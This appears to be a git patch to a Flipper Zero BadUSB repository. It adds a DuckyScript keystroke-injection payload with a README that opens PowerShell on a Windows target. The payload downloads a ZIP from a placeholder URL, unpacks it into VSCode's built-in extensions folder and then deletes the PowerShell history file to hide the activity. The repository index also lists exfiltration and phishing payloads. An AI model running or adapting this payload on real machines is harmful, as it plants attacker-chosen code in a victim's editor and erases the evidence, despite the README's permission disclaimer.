From 29becaf685fa3626a0d1ea883e8963ebd48b4969 Mon Sep 17 00:00:00 2001 From: Alessandro Greco Date: Thu, 5 Sep 2024 10:05:59 +0200 Subject: [PATCH] Install Any Arbitrary VSCode Extension This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks: 1. Removes any pre-existing version of the extension (if applicable). 2. Downloads a ZIP archive of a VSCode extension. 3. Extracts the extension to the correct VSCode extensions folder. The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension. --- README.md | 24 +++- .../README.md | 107 ++++++++++++++++++ .../payload.txt | 82 ++++++++++++++ Windows/README.md | 1 + 4 files changed, 210 insertions(+), 4 deletions(-) create mode 100644 Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/README.md create mode 100644 Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt diff --git a/README.md b/README.md index bb1dc80..013e027 100644 --- a/README.md +++ b/README.md @@ -41,11 +41,11 @@ |Type|Count| |--|--| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|30| -|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|46| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|47| |![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|4| |![macOS](https://img.shields.io/badge/mac%20os-000000?style=for-the-badge&logo=macos&logoColor=F0F0F0)|0 (*Buy me a Mac ^^*)| -|**Tot**|80| -|**Hak5** Payload accepted|111| +|**Tot**|81| +|**Hak5** Payload accepted|115| |**Hak5** Payload Awarded|2| @@ -78,6 +78,7 @@ |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Save Your Thunderbird Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Save_Your_Thunderbird_Settings)|🟑| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Attack](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingAttack_Linux)|🟑| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Phising|[Standard Phishing Payload Using kdialog](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Phising/StandardPhishingPayloadUsingKdialog_Linux)|🟑| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Any Arbitrary VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension)|🟑| |![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set Tor Bridge](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_Tor_Bridge)|🟑| @@ -135,7 +136,6 @@ |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟒| |//|Prank|[Flipper Zero GIF](img/gif)|🟒| - ## FAQs +## Where They Talk About This Repository + +- [CVE Feed](https://cvefeed.io/vuln/detail/CVE-2023-20273) +- [CSDN(Chinese Software Developer Network)/Full Article (Special Thanks!)](https://blog.csdn.net/gitblog_00086/article/details/139082132) +- [CSDN in-List](https://blog.csdn.net/gitblog_00085/article/details/141084245) +- [Infosec Writeups](https://infosecwriteups.com/the-ultimate-guide-cheatsheet-to-flipper-zero-d4c42d79d32c) +- [SOS-Intelligence](https://sosintel.co.uk/flipper-zero-an-introduction-to-its-capabilities-and-potential-risks/) +- [Intelligence](https://sosintel.co.uk/category/opinion/) +- [Achirou](https://achirou.com/guia-de-flipper-zero-hacking-con-badusb/) +- [Awesome Open Source - The Top 23 Flipperzero Open Source Projects](https://awesomeopensource.com/projects/flipperzero) +- [Decryptology](https://dev.decryptology.net/GitHub/awesome-flipperzero#badusb) +- [Gitters/Hak5](https://giters.com/topics/hak5) +- [Christan Workshop](https://christanworkshop.com/flipperzero) +- [Twitter/HAHWUL](https://x.com/hahwul/status/1829076650681872619) +- [Popdocs](https://flipper.popdocs.net/applications/duckyscript) + ## Some Boring Considerations This is my pay after over 1 year and 3 months of work. diff --git a/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/README.md b/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/README.md new file mode 100644 index 0000000..3f8d6eb --- /dev/null +++ b/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/README.md @@ -0,0 +1,107 @@ +# Install Any Arbitrary VSCode Extension + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +**Category**: Execution + +
+ +
+ +
+ +This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks: + +1. Removes any pre-existing version of the extension (if applicable). +2. Downloads a ZIP archive of a VSCode extension. +3. Extracts the extension to the correct VSCode extensions folder. + +The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension. + +## First Of All! + +Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment. + +So... +- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you. +- Always check the source and source code before doing this +- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage. + +## Features + +- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location. +- Removes any previous version of the extension. +- Completely automated, requiring no manual intervention once the script is executed. + +## Requirements + +- **Target OS**: Windows 10/11 +- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated. +- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly. +- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case.... + +## Usage + +### DuckyScript Configuration + +Before running the script, make sure to configure the following two variables in the script: + +1. `#EXTENSION_NAME`: Replace all occurrences with the name of the folder where the extension will be installed. + ```plaintext + STRING #EXTENSION_NAME + ``` + Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`. + +2. `https://example.com/path/to/NewExtension.zip`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install. + ```plaintext + STRING $url = "https://example.com/path/to/NewExtension.zip" + ``` + +### PowerShell Commands Breakdown + +- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it: + ```powershell + $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME" + if (Test-Path -Path $extensionsPath -PathType Container) { + Remove-Item -Recurse -Force -Path $extensionsPath + } + ``` + +- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder: + ```powershell + $url = "https://example.com/path/to/NewExtension.zip" + $downloadPath = "$env:TEMP\NewExtension.zip" + $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME" + Invoke-WebRequest -Uri $url -OutFile $downloadPath + if (Test-Path -Path $downloadPath) { + Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force + Remove-Item -Path $downloadPath -Force + } + ``` + +## Notes +- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install. +- Make sure that PowerShell is available on the target machine. +- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
diff --git a/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt b/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt new file mode 100644 index 0000000..8370ce4 --- /dev/null +++ b/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt @@ -0,0 +1,82 @@ +REM ########################################################## +REM # # +REM # Title : Install Any Arbitrary VSCode Extension # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Execution # +REM # Target : Windows 10 # +REM # # +REM ########################################################## + +DELAY 2000 +GUI r +DELAY 1000 +STRING PowerShell +ENTER +DELAY 1000 + +STRING $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\ + +REM Replace β€œ#EXTENSION_NAME” with the name of the extension folder to check if it already exists in order to delete it +STRING #EXTENSION_NAME + +STRING " +ENTER + +STRING if (Test-Path -Path $extensionsPath -PathType Container) { +ENTER +DELAY 250 +STRING Remove-Item -Recurse -Force -Path $extensionsPath +ENTER +DELAY 250 +STRING } +ENTER +DELAY 250 + +REM Replace β€œhttps://example.com/path/to/NewExtension.zip” with the link to the zipper archive containing the extension you want to install +STRING $url = "https://example.com/path/to/NewExtension.zip" +ENTER +DELAY 250 + +REM It will download within a temporary folder and only after downloading will it be extracted to the extensions folder +STRING $downloadPath = "$env:TEMP\NewExtension.zip" +ENTER +DELAY 250 +STRING $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\ +ENTER +DELAY 250 + +REM Replace again "#EXTENSION_NAME" with the official extension name +STRING #EXTENSION_NAME +ENTER +DELAY 250 + +STRING " +ENTER +DELAY 250 + +STRING Invoke-WebRequest -Uri $url -OutFile $downloadPath +ENTER +DELAY 250 + +REM Check if the file was downloaded correctly +STRING if (Test-Path -Path $downloadPath) { +ENTER +DELAY 250 + +REM Extract the contents of the zipper file into the extensions directory +STRING Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force +ENTER +DELAY 250 + +STRING Remove-Item -Path $downloadPath -Force +ENTER +DELAY 250 + +REM Clear the command history in PowerShell by deleting the history file +STRING Remove-Item (Get-PSReadlineOption).HistorySavePath; exit +ENTER +DELAY 250 + +STRING } +ENTER \ No newline at end of file diff --git a/Windows/README.md b/Windows/README.md index db7980b..e7f649b 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -45,6 +45,7 @@ |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Exfiltrates the entire database of the Notion client](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Create And Exfiltrate A Webhook Of Discord](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Exfiltration|[Save Your Thunderbird Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Exfiltration/Save_Your_Thunderbird_Settings)|🟑| +|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Install Any Arbitrary VSCode Extension](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_Any_Arbitrary_VSCode_Extension)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set An Arbitrary And Persistent Tor Circuit](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Set Tor Bridge](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/Set_Tor_Bridge)|🟑| |![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Execution|[Close All Applications](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Execution/CloseAllApplications_Windows)|🟒|